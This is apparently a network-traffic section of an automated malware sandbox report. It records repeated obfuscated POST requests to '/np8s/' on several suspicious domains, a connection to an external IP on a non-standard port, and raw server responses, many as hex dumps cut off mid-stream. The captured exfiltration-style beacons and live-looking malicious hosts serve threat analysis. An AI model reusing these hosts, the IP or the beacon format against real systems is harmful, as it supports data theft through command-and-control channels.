Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 65 41 62 30 69 74 45 28 79 79 55 45 61 45 58 76 6b 68 67 42 43 35 79 79 46 73 6f 50 48 47 74 62 6c 7a 6d 6d 37 37 55 6b 31 37 59 76 46 31 4d 5a 61 4c 57 32 35 56 70 68 6b 79 6e 51 31 7a 50 39 59 5a 44 6a 45 64 7a 31 42 4e 58 54 68 6c 31 58 6f 72 41 43 70 30 6b 68 61 52 56 30 56 51 56 73 66 4d 56 61 75 4f 6a 45 36 4d 71 34 6f 67 69 55 31 59 59 72 4c 69 78 50 4e 39 6b 54 33 49 43 30 4e 6e 72 4c 31 61 36 6a 62 55 53 61 6e 70 6b 55 52 54 56 5a 6c 37 32 75 39 64 45 79 51 78 65 4a 31 46 65 79 58 4a 51 75 73 4b 4d 37 33 43 4a 45 31 47 48 42 63 44 36 45 67 78 69 68 52 6f 6d 44 4a 52 33 30 30 4d 65 58 31 38 77 32 30 5a 59 43 47 77 37 72 45 61 69 6a 58 41 44 71 76 58 61 77 30 6b 58 39 6b 35 68 79 5a 75 6f 6a 33 28 68 42 38 6f 6c 41 49 66 33 38 36 4b 32 57 48 48 4c 68 73 33 68 72 47 51 48 73 44 64 44 58 5f 4e 32 51 36 4b 5a 43 54 30 66 50 62 76 68 56 4f 48 4e 61 74 6d 63 32 62 28 44 54 34 53 47 58 7a 30 5f 69 65 77 6d 38 4c 7a 58 51 41 79 7a 66 72 4c 41 33 78 53 35 33 4c 67 4e 38 5a 63 78 44 6d 69 68 56 65 75 42 41 6f 7a 4d 52 33 78 4a 35 71 6c 6a 33 6b 36 45 4f 35 77 46 53 79 61 4a 6c 7a 34 4b 67 74 61 4f 50 37 79 59 35 49 35 6c 6d 5a 43 65 62 54 39 53 42 32 46 55 51 4c 77 4f 79 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 62 70 43 37 79 42 5a 6e 43 7e 33 51 49 45 44 37 46 78 69 4e 53 39 78 33 45 42 34 59 43 62 63 56 45 44 62 6e 2d 50 65 7a 57 50 31 6b 6d 46 69 5a 62 37 5f 36 71 78 74 72 55 4f 6b 51 31 37 78 39 59 56 44 67 45 31 6a 77 53 30 36 54 43 4e 30 56 49 72 38 42 70 30 48 6c 59 6c 34 30 56 63 37 73 66 45 46 5a 66 79 6a 47 66 49 71 36 72 49 58 61 31 59 61 31 62 79 74 4c 4e 78 44 54 33 77 61 30 49 66 72 4c 46 57 36 6a 34 4d 52 63 6c 42 72 54 42 54 55 53 46 36 79 67 64 59 33 79 51 31 38 4a 77 6c 65 79 68 78 51 68 59 47 4d 77 67 57 4b 64 56 47 34 46 63 44 4e 41 67 39 4a 68 52 6b 51 44 4c 39 4e 30 42 45 65 57 46 38 7a 7a 6e 70 68 46 52 73 57 34 55 47 5f 6a 58 4e 70 72 2d 4c 38 77 77 31 30 70 6d 77 58 73 4c 58 48 6a 31 7a 50 44 63 6f 68 5a 34 66 57 38 36 4b 57 57 48 48 70 68 74 6e 68 72 42 4d 48 74 67 31 44 41 75 4e 78 66 36 4b 51 4c 7a 31 4d 41 37 72 64 56 4f 50 64 61 70 71 36 32 71 37 44 53 5a 69 47 55 42 4d 38 33 4f 78 74 34 4c 79 42 61 67 79 47 66 72 4c 70 33 30 71 70 32 34 55 4e 36 4c 30 78 41 43 43 68 46 2d 75 42 5a 59 7a 4f 61 58 38 43 35 71 74 6e 33 68 7e 2d 4f 4b 63 46 52 6b 47 4a 72 78 41 4b 6a 64 61 4f 43 62 7a 74 32 59 73 71 6d 59 37 75 59 79 52 37 50 78 41 5f 61 62 68 4b 68 62 7a 67 7a 46 34 76 59 6b 54 56 54 79 42 50 59 55 64 4d 35 64 6c 5a 52 6c 37 45 43 64 34 6a 51 50 74 4c 53 58 42 4b 78 45 65 38 71 66 79 64 4e 69 38 72 70 44 35 54 33 66 79 56 4e 38 42 38 38 31 30 34 4c 30 30 5a 6e 66 65 6f 50 6f 79 66 63 72 37 65 4d 36 45 4d 56 5f 6b 68 71 58 32 36 6f 6b 7e 53 36 45 33 35 50 75 67 61 75 74 30 44 7a 68 63 79 64 56 47 55 74 68 31 68 6a 35 4d 6e 47 41 65 44 6f 58 7e 58 58 74 6d 52 41 6b 49 36 46 63 55 62 33 55 39 78 34 67 78 74 67 77 70 73 6a 6b 52 5a 76 76 62 49 6d 68 4a 73 61 67 75 4f 4f 39 67 66 4f 39 67 58 69 38 64 47 39 4c 33 30 6f 5a 36 34 31 65 55 69 4e 58 53 4c 39 6e 72 6f 77 7a 78 32 6e 58 6f 37 42 44 6c 72 28 72 5a 52 6d 4d 67 74 77 72 77 6c 41 5f 75 6f 4d 5a 36 34 71 2d 78 32 70 43 78 4f 46 48 45 32 57 78 77 42 74 62 69 6d 4f 66 32 51 45 49 62 34 59 41 53 50 39 6d 30 6a 62 5f 67 33 36 51 4e 69 4a 4a 34 5a 4a 37 66 56 6b 35 4f 71 33 62 56 76 4e 68 6b 6c 57 71 6c 6f 32 43 62 4a 62 68 72 44 71 36 42 31 63 2d 73 55 78 44 30 49 33 4e 72 57 70 56 67 4d 36 68 31 4b 56 66 31 52 48 49 6a 53 71 78 64 63 73 31 56 61 41 58 4a 61 35 6f 4d 57 61 6c 59 76 37 53 77 6a 51 51 71 37 4c 68 6c 70 34 78 34 44 4c 45 30 73 50 49 67 70 4b 67 31 6f 4c 73 59 42 56 64 66 4a 65 2d 50 54 54 70 70 78 66 75 37 37 7e 42 4d 33 42 64 79 4b 6c 32 39 39 56 59 79 42 6b 6b 37 73 71 5f 50 61 4e 4a 5a 58 76 6c 70 6c 41 65 38 41 34 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 5a 67 43 72 46 35 79 32 45 73 4d 42 52 64 35 50 48 77 34 51 53 30 31 32 4d 78 36 45 42 48 64 32 74 45 33 38 37 67 51 35 7e 52 62 39 77 45 66 71 4d 37 35 4b 6d 57 7e 31 50 50 76 38 74 49 4a 47 57 49 36 43 68 35 41 49 72 70 43 79 42 52 5a 66 35 48 30 6f 57 77 43 41 32 34 38 66 59 6f 41 45 35 68 57 61 45 71 52 31 36 4f 62 5f 64 72 48 4c 41 39 4d 48 70 7a 57 41 6a 75 78 70 61 4d 38 6e 51 62 4d 32 72 6f 6b 4f 51 69 32 51 77 51 6a 47 79 65 64 62 55 79 45 42 53 6b 6a 76 7e 54 63 4c 30 63 78 30 6d 75 45 6a 28 6d 34 4c 73 73 71 4b 54 74 4d 4f 7e 76 72 48 44 32 4c 4d 41 5f 4e 76 43 4e 36 75 5a 33 37 54 69 35 71 34 39 64 4b 51 79 38 4a 61 28 52 35 78 36 73 41 37 72 79 49 71 50 37 35 48 4c 73 4d 6e 50 5a 76 72 48 66 72 32 57 51 74 64 47 59 7e 50 4a 6c 59 42 55 45 4a 62 70 4e 33 74 31 5f 50 30 30 45 42 69 36 4b 6e 56 77 7a 6a 73 35 49 6a 41 6d 44 34 43 71 79 62 71 79 31 53 35 4a 56 79 53 6b 46 70 77 78 70 53 65 79 68 5a 42 69 49 6d 30 28 5f 37 41 32 6c 4d 66 55 36 77 50 6c 4a 64 4e 32 74 69 59 50 30 4c 39 64 6a 6b 56 6f 41 7e 46 51 53 30 47 59 72 41 53 35 77 39 4f 55 58 75 47 63 37 79 45 46 47 28 4e 72 43 4b 62 79 38 4c 75 64 51 56 63 76 72 30 51 4e 50 52 72 62 58 32 66 69 4b 7e 71 69 57 73 65 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=ZgCrF5y2EsMBRd5PHw4QS012Mx6EBHd2tE387gQ5~Rb9wEfqM75KmW~1PPv8tIJGWI6Ch5AIrpCyBRZf5H0oWwCA248fYoAE5hWaEqR16Ob_drHLA9MHpzWAjuxpaM8nQbM2rokOQi2QwQjGyedbUyEBSkjv~TcL0cx0muEj(m4LssqKTtMO~vrHD2LMA_NvCN6uZ37Ti5q49dKQy8Ja(R5x6sA7ryIqP75HLsMnPZvrHfr2WQtdGY~PJlYBUEJbpN3t1_P00EBi6KnVwzjs5IjAmD4Cqybqy1S5JVySkFpwxpSeyhZBiIm0(_7A2lMfU6wPlJdN2tiYP0L9djkVoA~FQS0GYrAS5w9OUXuGc7yEFG(NrCKby8LudQVcvr0QNPRrbX2fiK~qiWse(A).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 5a 67 43 72 46 37 33 6a 61 50 59 59 53 4e 31 38 45 41 73 45 48 55 46 30 4e 42 7e 48 4f 6d 77 32 6e 56 47 4e 31 43 59 49 28 54 62 6e 6d 6b 44 48 62 73 31 43 6d 53 36 51 56 73 47 33 36 34 56 46 57 4d 57 38 68 35 30 49 6f 70 71 35 41 32 46 35 33 45 63 76 55 51 44 37 31 34 38 47 54 4e 67 6c 35 6e 4c 31 45 71 59 2d 36 2d 6e 5f 50 59 76 4c 52 75 30 4d 30 44 58 46 67 71 63 32 43 73 77 41 51 62 55 75 72 73 73 4f 51 53 36 51 7a 78 54 46 6c 50 64 63 5a 43 45 41 5a 45 6a 36 33 7a 41 66 30 63 46 4b 6d 72 6b 6a 28 30 63 4c 71 74 4b 4b 61 38 4d 4a 30 5f 72 65 48 32 4c 46 45 5f 52 36 43 4a 61 59 5a 79 57 73 69 4a 75 34 39 74 4b 52 33 76 35 73 6f 79 51 6e 38 73 63 63 72 79 55 51 50 70 4d 55 4c 74 51 48 49 72 33 51 62 72 54 63 57 54 42 33 41 34 7e 4c 43 46 59 67 55 45 4a 72 70 4e 33 48 31 5f 28 30 30 44 6c 69 34 73 37 56 67 68 62 76 6b 59 6a 5f 74 6a 35 52 6e 53 58 61 79 78 7e 70 4a 51 65 30 6b 32 46 77 6a 38 32 65 30 56 74 4f 76 6f 6d 36 78 66 37 6a 28 46 4d 51 55 36 77 58 6c 49 64 64 78 63 7e 59 56 41 66 39 64 42 4d 56 71 77 7e 46 65 79 31 41 57 4c 4d 43 35 77 6c 4b 55 53 72 39 63 4b 32 45 45 54 6a 4e 71 6e 7e 62 78 4d 4c 75 52 77 56 4f 70 36 41 62 62 64 31 55 57 6b 69 55 6e 66 58 76 68 6e 64 67 76 4f 32 75 7e 4b 4c 50 48 31 58 54 68 7a 35 30 71 50 50 6a 67 52 70 55 63 73 4f 49 39 46 30 54 31 41 79 4b 56 64 58 46 43 52 6d 4e 4c 49 53 46 71 57 6f 73 4b 5f 75 71 4c 2d 66 37 79 6b 39 50 73 61 51 75 68 4f 39 4e 55 4f 7e 44 42 47 6a 30 77 6f 57 72 77 77 5a 62 35 35 35 2d 41 71 71 4e 55 72 35 56 50 6b 70 48 6d 68 74 2d 58 6c 39 5f 53 5a 51 65 78 34 73 33 79 75 77 43 36 6d 56 70 51 6a 35 4a 61 55 4b 67 39 56 4d 57 28 46 64 38 6c 2d 53 4e 4d 4a 7e 55 69 56 6d 37 32 52 7a 64 6b 71 52 69 6d 66 43 6e 76 39 73 44 54 43 49 6d 72 78 49 64 31 4b 51 69 6d 47 71 65 59 41 50 31 55 36 53 66 79 36 78 7a 67 76 46 52 56 73 32 57 46 62 74 67 57 77 4e 52 65 51 41 6e 69 72 34 70 73 47 6a 55 6c 6f 4f 48 43 63 65 63 53 5f 34 68 6d 57 33 48 4b 5a 72 62 6e 38 74 30 36 52 52 46 58 51 6d 35 62 43 46 4c 39 4b 47 42 6b 33 36 48 6f 79 6e 32 67 36 5a 7a 39 42 31 6e 7a 41 49 39 4d 51 73 69 42 78 4f 38 65 2d 6e 48 66 53 79 33 62 35 65 58 49 75 77 46 4d 62 5a 41 36 44 38 69 38 73 31 56 47 32 6f 41 55 71 77 41 69 7a 69 43 77 38 77 6f 7e 6c 6e 4c 57 46 37 56 35 69 6c 38 39 69 55 6c 4d 58 68 62 73 75 32 54 34 4e 56 61 68 57 64 64 34 4f 58 44 41 5a 37 6c 62 68 32 6c 51 37 47 6f 66 4b 33 47 6a 4d 30 6a 70 72 70 32 52 35 78 76 34 5f 53 57 53 58 37 5f 38 54 77 35 39 34 55 47 7a 69 61 50 59 6f 57 70 31 58 43 42 4d 42 6f 58 43 71 6e 52 7a 31 4e 64 75 7a 79 69 43 77 45 6c 71 54 55 46 46 58
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 42 43 6b 47 48 6c 45 74 28 69 41 49 73 62 79 4d 43 49 54 4c 48 75 7e 4f 39 6b 6b 73 45 30 56 74 4f 75 70 6b 66 30 4b 53 4e 56 55 4e 73 74 44 44 57 6f 44 62 48 6d 4e 42 7e 67 72 55 72 68 4f 4a 67 36 78 71 78 43 75 38 65 42 61 63 38 68 54 6f 54 65 61 79 54 37 36 31 44 70 78 70 44 74 4f 6e 71 7a 54 45 6f 4c 64 56 68 54 72 38 70 76 45 67 50 59 7e 4f 39 69 38 61 6a 30 68 37 28 39 6d 56 55 5a 5a 70 74 47 6b 49 77 45 44 5a 74 45 39 49 78 42 67 41 37 5f 33 38 6c 62 4d 75 41 4b 67 7a 67 42 4c 65 68 55 5a 4e 57 57 48 6f 4d 51 6a 6d 44 5f 5a 52 72 47 35 70 28 75 7e 36 4a 46 43 63 32 53 39 46 64 52 4a 76 76 39 62 33 72 45 69 56 4e 65 28 51 6c 38 75 64 41 5f 6d 74 72 38 72 4a 39 63 48 4c 4b 4a 38 6a 78 34 55 53 45 4c 70 6b 58 55 62 5f 73 57 72 32 6e 44 38 39 72 47 6c 30 6f 4d 4b 33 63 38 55 64 75 43 36 55 45 75 42 4d 45 34 54 7a 67 5a 69 4f 77 39 4d 7a 67 51 45 66 46 51 7a 34 62 4d 31 32 55 4b 6d 32 36 67 65 51 4a 56 44 47 78 65 59 6c 75 66 69 70 4e 61 32 33 31 73 57 39 4e 4a 54 77 6f 48 78 72 61 4f 79 6c 38 49 72 35 70 45 7a 6c 71 45 76 79 45 43 4e 6c 4e 41 39 77 68 49 6f 54 48 44 7e 72 4e 34 37 4a 39 4d 36 5f 37 45 38 6c 42 4a 48 6e 35 31 49 4e 41 42 6d 73 4a 45 55 4f 6a 64 4c 4e 63 43 6e 30 38 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=BCkGHlEt(iAIsbyMCITLHu~O9kksE0VtOupkf0KSNVUNstDDWoDbHmNB~grUrhOJg6xqxCu8eBac8hToTeayT761DpxpDtOnqzTEoLdVhTr8pvEgPY~O9i8aj0h7(9mVUZZptGkIwEDZtE9IxBgA7_38lbMuAKgzgBLehUZNWWHoMQjmD_ZRrG5p(u~6JFCc2S9FdRJvv9b3rEiVNe(Ql8udA_mtr8rJ9cHLKJ8jx4USELpkXUb_sWr2nD89rGl0oMK3c8UduC6UEuBME4TzgZiOw9MzgQEfFQz4bM12UKm26geQJVDGxeYlufipNa231sW9NJTwoHxraOyl8Ir5pEzlqEvyECNlNA9whIoTHD~rN47J9M6_7E8lBJHn51INABmsJEUOjdLNcCn08g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 42 43 6b 47 48 6e 51 37 78 32 77 56 78 62 50 73 57 65 58 66 50 5f 75 4d 78 30 6f 6a 61 47 51 74 4b 61 74 61 41 68 32 6a 63 67 51 62 6f 64 65 54 53 75 58 54 48 6e 38 6c 77 7a 50 75 76 42 4b 4b 67 37 56 55 78 43 71 38 66 41 79 4d 38 47 66 4f 55 38 69 39 52 62 36 4a 45 70 77 76 56 63 53 4b 71 7a 57 52 6f 4c 45 4b 68 6a 48 38 6f 4e 38 67 4a 5a 7e 4a 69 53 38 44 67 30 52 6e 37 39 72 48 55 5a 42 68 74 43 6b 49 78 30 50 5a 33 6b 74 4a 6d 57 4d 44 6a 5f 32 58 7a 4c 4d 4e 4f 71 6c 41 67 42 48 77 68 52 35 4e 57 41 76 6f 44 67 44 6d 49 75 5a 53 7e 6d 35 73 73 2d 7e 6a 4e 46 50 45 32 53 52 5a 64 56 52 56 75 49 62 33 6c 55 69 59 63 5f 37 75 75 39 75 30 43 5f 53 61 72 39 58 6b 39 4e 71 59 4b 4c 35 47 6e 36 4d 70 59 2d 31 65 58 52 4c 42 76 32 71 5f 76 6a 38 71 72 47 6c 45 6f 4d 4b 5a 63 39 6b 64 75 44 79 55 46 49 46 4d 48 61 36 6c 76 5a 69 4c 71 4e 4d 72 7e 67 5a 75 46 51 71 6d 62 4d 39 49 55 37 69 32 37 45 53 51 65 33 72 48 77 75 59 6a 67 5f 69 67 66 61 32 34 31 73 57 4c 4e 49 53 74 76 30 31 72 49 76 79 6c 73 61 44 35 6c 55 7a 6c 6d 6b 76 77 4c 69 42 50 4e 41 31 38 68 49 5a 6d 48 77 53 72 49 36 44 4a 7a 4a 61 5f 34 30 38 6c 4f 70 48 35 32 30 52 42 47 77 75 5f 4c 6e 30 44 70 61 43 36 53 47 76 5f 67 75 48 56 41 34 78 5a 4d 6f 70 2d 31 65 47 35 79 72 55 52 33 54 56 69 4b 78 7e 4c 75 5f 35 4d 67 6d 58 36 43 58 69 31 38 4b 52 4e 73 48 6f 56 49 73 4b 46 4c 4a 68 42 68 73 31 4f 58 6f 7e 67 76 53 53 77 55 65 68 52 71 73 71 67 49 58 32 5a 4e 6b 77 6c 7a 69 43 6b 52 6c 49 77 39 61 45 43 55 61 7a 30 41 50 70 73 41 57 70 47 6d 55 64 39 74 53 44 33 54 6e 74 38 6a 63 58 43 41 78 6e 48 47 63 4c 30 54 63 69 53 68 64 4d 6f 31 44 55 57 64 51 71 41 54 41 53 63 7e 74 7e 69 77 59 47 46 4a 76 32 79 68 41 6b 6e 41 76 58 5a 73 57 28 4b 53 71 57 4d 64 68 57 78 4f 59 6c 74 5a 30 55 41 71 48 45 6f 46 73 76 74 6c 6a 54 31 43 71 7a 2d 50 6b 53 4f 28 4c 47 74 65 34 41 6e 39 66 6d 4d 69 71 79 52 68 6c 6f 42 6e 36 56 74 76 6a 7e 47 7a 75 69 6e 78 54 58 78 61 4d 64 54 36 47 62 35 36 4b 63 57 49 49 62 74 28 37 5a 4f 79 71 71 68 57 67 5a 4c 6c 6b 75 77 44 32 66 78 70 37 31 51 68 61 74 41 6a 2d 4f 6c 4b 38 30 67 74 31 7e 54 77 70 42 61 47 69 61 53 50 74 36 41 63 41 35 32 36 2d 63 38 28 67 7a 43 41 76 6a 49 4c 69 78 51 61 33 43 6f 6a 6e 4b 64 5a 59 50 4d 46 45 6e 50 73 74 63 36 28 61 48 73 73 66 4b 68 45 30 53 79 59 4b 28 31 66 55 55 55 38 66 57 4c 6d 34 70 63 71 47 39 6f 36 5f 4a 39 75 2d 76 5a 45 6a 4e 33 37 61 4a 4a 69 75 46 74 38 5f 79 6d 73 6e 54 4b 78 67 66 2d 58 63 44 6d 56 39 4b 61 43 74 47 51 76 58 38 55 65 71 79 69 59 52 75 4a 4e 4f 32 43 4e 67 79 4e 6c 69 59 64 65
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49740 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 15:27:43 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8x-litespeed-tag: 440_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 27 May 2022 15:28:02 GMTserver: LiteSpeedData Raw: 32 66 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 e3 b6 92 e8 67 bb ea fc 07 0c 5d 19 4b 09 49 91 d4 9b b2 9c 3d 99 3c 36 5b c9 9e 54 26 d9 5b b7 92 d4 14 44 42 12 67 28 92 87 84 2c 39 8e ef 6f bf d5 78 f0 25 50 2f 8f 93 d4 ce 24 95 58 24 81 ee 46 a3 d1 dd 00 1a 8d 9b 17 5f fe eb d5 4f ff f7 87 af d0 92 ae c2 db cb 1b f8 83 42 1c 2d a6 1a 89 8c 9f 5f 6b f0 8e 60 ff f6 f2 e2 66 45 28 46 de 12 a7 19 a1 53 ed e7 9f be 36 46 1a ea e4 5f 22 bc 22 53 ed 2e 20 9b 24 4e a9 86 bc 38 a2 24 a2 53 6d 13 f8 74 39 f5 c9 5d e0 11 83 3d e8 28 88 02 1a e0 d0 c8 3c 1c 92 a9 cd e0 70 04 0c cc 75 1a cf 62 9a 5d e7 40 ae 57 78 6b 04 2b bc 20 46 92 12 40 e2 86 38 5d 90 6b 20 e0 86 06 34 24 b7 3f e0 05 41 51 4c d1 3c 5e 47 3e 7a 79 35 72 6c 7b 82 be bf 47 5f 84 f1 e2 a6 c3 4b 5d de 84 41 f4 0e a5 24 9c 5e fb 51 06 e0 e6 84 7a cb 6b b4 4c c9 7c 7a dd e9 d0 25 99 91 8c de 05 fe 3c 4e 71 18 9a db fb df 39 9e 43 35 33 73 63 c6 e9 a2 56 58 c3 21 25 69 84 29 d1 10 bd 4f c8 54 c3 49 12 06 1e a6 41 1c 75 d2 2c fb 6c bb 0a 35 c4 c8 9b 6a 82 5c f4 32 c5 ff 5e c7 13 f4 35 21 be c6 69 d3 96 94 26 ae 9a c0 ce 9c 10 bf c3 f9 98 93 f9 34 cc af e2 d5 8a 44 34 3b 9a 04 4f 54 28 d3 92 79 69 90 d0 db cb 4d 10 f9 f1 c6 7c b3 49 c8 2a 7e 1b bc 26 94 06 d1 22 43 53 f4 a0 cd 70 46 7e 4e 43 cd 65 0d cc dc 5f 3b bf 76 04 2b 7f ed b0 4e cf 7e ed 78 71 4a 7e ed b0 ca bf 76 ec 9e 69 99 d6 af 9d a1 b3 1d 3a bf 76 34 5d 23 5b aa b9 9a 99 44 0b 4d d7 b2 bb c5 79 f0 b2 bb 05 83 96 dd 2d be e2 00 b3 3b 06 30 5e a7 1e d1 dc 07 cd 8b 23 0f 53 46 86 a0 97 91 ab 92 99 5f 3b 9b c4 08 22 2f 5c fb 24 fb b5 f3 36 63 2f 58 55 23 25 21 c1 19 31 57 41 64 be cd 3e bf 23 e9 74 60 5a da e3 e3 e4 b2 f3 e9 0b f4 d3 32 c8 d0 3c 08 09 0a 32 84 d7 34 36 16 24 22 29 a6 c4 47 9f 76 2e 5f cc d7 91 07 d2 d3 22 3a d6 69 fb e1 0e a7 28 d2 53 3d d6 83 29 36 bd 94 60 4a be 0a 09 74 5f 4b f3 70 74 87 33 ad ad 27 d3 c0 5c 10 fa 0a 06 e6 96 be 7c 59 7e 6a 69 8e af b5 27 12 30 ca 5a 44 02 c6 d3 d7 34 0d a2 85 39 4f e3 d5 ab 25 4e 5f c5 3e d1 c9 b4 95 98 5e 48 70 fa 23 f1 68 cb d2 2d 3d 30 f9 e8 0e cc 25 09 16 4b da d6 13 73 1e 84 e1 4f 64 4b 5b d8 04 a9 bf 6f d1 65 90 e9 a4 ad 5b ba d5 d6 03 93 c6 5f 62 8a 7f fe f1 bb 56 bb 3d 49 09 5d a7 11 3a 1f 2e 15 70 c9 74 3a ad c0 7e cc 1b e6 b5 08 e7 17 dd e5 14 17 56 ad 3d a1 66 96 7a 53 a2 53 d3 27 73 92 4e a9 c9 07 2e f0 ad f3 16 df 61 51 52 c7 c0 50 c1 e9 ec 8b fb 9f f0 e2 bf f1 8a b4 34 d0 99 5a fb 17 eb 37 68 35 89 fc 57 cb 20 f4 5b b4 fd 38 8f d3 56 3c fd 67 9a e2 fb 96 36 0f 31 48 17 97 a6 b6 4e cd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://thebestvidforall.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: public,max-age=3600x-litespeed-tag: 440_HTTP.404,440_404,440_URL.249cf122f2d92b3e82f0723a2e93dc1c,440_x-litespeed-cache: misstransfer-encoding: chunkeddate: Fri, 27 May 2022 15:28:02 GMTserver: LiteSpeedData Raw: 66 35 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 